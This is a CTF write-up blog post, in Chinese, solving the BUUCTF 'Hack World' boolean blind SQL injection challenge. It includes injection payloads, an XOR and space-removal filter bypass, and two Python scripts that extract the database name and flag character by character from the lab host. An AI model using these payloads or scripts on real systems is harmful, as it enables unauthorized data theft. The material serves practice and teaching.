id=0

id=1

id=2

id=3





发现结果不一样,尝试 : ">4","=4","<4" : 




在自己的环境下验证一下:




爆一下数据库:




id=(ascii(substr(database(),1,1))>32)








'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,129):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"(ascii(substr(database(),%d,1))=%d)" %(i,j)}

             # data={"id":"(ascii(substr((select flag from flag),%d,1))=%d)" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








过滤如何处理:


在爆flag的时候发现有过滤 :select,show,""……很是难受,后来在师傅的博客上看到了这种方法:




id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))






1^1=0 ,0^0=0 ,0^1=1


1^1^1=1, 1^1^0=0
构造payload:1^ascii(mid(database(),1,1)=98)^0


注意这里会多加一个^0或1是因为在盲注的时候可能出现了语法错误也无法判断,而改变这里的0或1,如果返回的结果是不同的,那就可以证明语法是没有问题的


其实不用抑或也行:




id=(ascii(substr((select(flag)from(flag)),1,1))<128)






居然去掉空格就成功绕过了Orz,这个方法要学习一下,这里贴一下我的脚本,没有用二分十分简单的枚举:




'''

@Modify Time      @Author

------------      -------

2019/10/25 19:28   laoalo

'''

import requests

from lxml import etree

def a():

    url="http://6a93b089-ace7-4ece-8334-b10dd79ac360.node3.buuoj.cn/"

    flag="Hello, glzjin wants a girlfriend."

    final=""

    stop=0

    for i in range(1,1290):

         print("*"*50,i,"*"*50)

         stop=0

         for j in range(32,129):

             stop = j

             data={"id":"1^(if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1))" %(i,j)}

             re = requests.post(url=url,data=data).text.replace('\n','')

             html = etree.HTML(re).xpath("//text()")

             # print(">>",html)

             if flag in html:

                  final+=chr(j)

                  print("\n\t\t\t\t",final)

                  break

         if stop >= 128:

            print("*"*50,"结束")

            print(">>",final)

            break

if __name__ == '__main__':

       a()








参考资料:


SQL注入学习总结(八):其他SQL注入的异或注入:https://blog.csdn.net/weixin_30740295/article/details/96833688




buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World:https://blog.csdn.net/weixin_43345082/article/details/99062970


												


											
BUUCTF | [CISCN2019 华北赛区 Day2 Web1]Hack World的更多相关文章
	

    
								
  1. 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    目录 刷题记录:[CISCN2019 华北赛区 Day2 Web1]Hack World 一.前言 二.正文 1.解题过程 2.解题方法 刷题记录:[CISCN2019 华北赛区 Day2 Web1] ...
    
		
    2. 
						
  2. [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    知识点:题目已经告知列名和表明为flag,接下来利用ascii和substr函数即可进行bool盲注 eg: id=(ascii(substr((select(flag)from(flag)),1,1 ...
    
		
    3. 
						
  3. BUUOJ [CISCN2019 华北赛区 Day2 Web1]Hack World
		
    补一下这道题,顺便发篇博客 不知道今年国赛是什么时候,菜鸡还是来刷刷题好了 0X01 考点 SQL注入.盲注.数字型 0X02自己尝试 尝试输入1 赵师傅需要女朋友吗???随便都能有好吧 输入2 ?? ...
    
		
    4. 
						
  4. 刷题[CISCN2019 华北赛区 Day2 Web1]Hack World
		
    解题思路 打开发现是很简单的页面,告诉了表名和列名,只需知道字段即可 尝试一下,输入1,2都有内容,后面无内容.输入1'让他报错,发现返回bool(false) 大概思路就是布尔型注入了,通过不断返回 ...
    
		
    5. 
						
  5. [CISCN2019 华北赛区 Day2 Web1]Hack World 1详解
		
    打开题目, 我们开始尝试注入, 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do ...
    
		
    6. 
						
  6. [CISCN2019 华北赛区 Day2 Web1]Hack World(二分法写布尔注入脚本)
		
    记一道布尔注入的题,存在过滤字符. 从题目看应该是一道注入题.提示存在flag表flag列. 输入1和2的返回结果不一样,可能是布尔注入. 简单用万能密码尝试了一下.提示SQL Injection C ...
    
		
    7. 
						
  7. BUUCTF | [CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    步骤: 1.运行这个: <?php class User { public $db; } class File { public $filename; } class FileList { pr ...
    
		
    8. 
						
  8. 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    目录 刷题记录:[CISCN2019 华北赛区 Day1 Web1]Dropbox 一.涉及知识点 1.任意文件下载 2.PHAR反序列化RCE 二.解题方法 刷题记录:[CISCN2019 华北赛区 ...
    
		
    9. 
						
  9. PHAR伪协议&&[CISCN2019 华北赛区 Day1 Web1]Dropbox
		
    PHAR:// PHP文件操作允许使用各种URL协议去访问文件路径:如data://,php://,等等 include('php://filter/read=convert.base64-encod ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. python web自动化测试框架搭建(功能&接口)——测试用例执行和结果收集
			
    由于unittest框架中结果收集在不同文件中,所以此处重写结果收集方法,加入执行时间,失败信息,失败截图等 TestRunner.py # coding=utf-8 import sys impor ...
    
			
    2. 
						
  2. 【EWM系列】SAP EWM模块-修改任何内容都报错
			
    公众号:SAP Technical 本文作者:matinal 原文出处:http://www.cnblogs.com/SAPmatinal/ 原文链接:[EWM系列]SAP EWM模块-修改任何内容都 ...
    
			
    3. 
						
  3. Codeforces Round #410 (Div. 2)B. Mike and strings(暴力)
			
    传送门 Description Mike has n strings s1, s2, ..., sn each consisting of lowercase English letters. In  ...
    
			
    4. 
						
  4. linux操作系统的调度策略
			
    linux的进程分为两种 1.实时进程,优先级高,操作系统会优先执行这种进程 2.普通进程,大多数的进程都是这种进程 调度策略 unsigned int policy; 调度策略的定义 #define ...
    
			
    5. 
						
  5. Robotframework使用自写库连接mysql数据库
			
    Robotframework使用自写库连接mysql数据库 新建库文件mysqltest.py 代码如下: # -*- coding: utf-8 -*- import MySQLdbimport o ...
    
			
    6. 
						
  6. 【报错】An error happened during template parsing (template: "class path resource [templates/hello1.html]")
			
    页面显示: Whitelabel Error Page This application has no explicit mapping for /error, so you are seeing t ...
    
			
    7. 
						
  7. 开发中遇到的相关linux问题
			
    一:java.sql.SQLException: Access denied for user 'root'@'10.150.152.200' (using password: YES) 1:用户名后 ...
    
			
    8. 
						
  8. Codeforces 1162E Thanos Nim(博弈)
			
    一道有意思的博弈题.首先我们考虑一种必败情况,那就是有一方拿光了一堆石子,显然对方是必胜,此时对方可以全部拿走其中的n/2,那么轮到自己时就没有n/2堆,所以此时是必败态.我们先对所有石子堆sort, ...
    
			
    9. 
						
  9. elasticsearch 基础 —— Update By Query API
			
    Update By Query API 最简单的用法是_update_by_query在不更改源的情况下对索引中的每个文档执行更新.这对于获取新属性或其他一些在线映射更改很有用 .这是API: POS ...
    
			
    10. 
						
  10. day04 列表增删改查、元祖以及range
			
    01 课前小甜点 千万不要随意做决定 只要你做了决定,你要坚持下去. 02 昨日内容回顾 int <---> bool : 非0 True 0 False True 1 False 0 i ...
    
			
    11.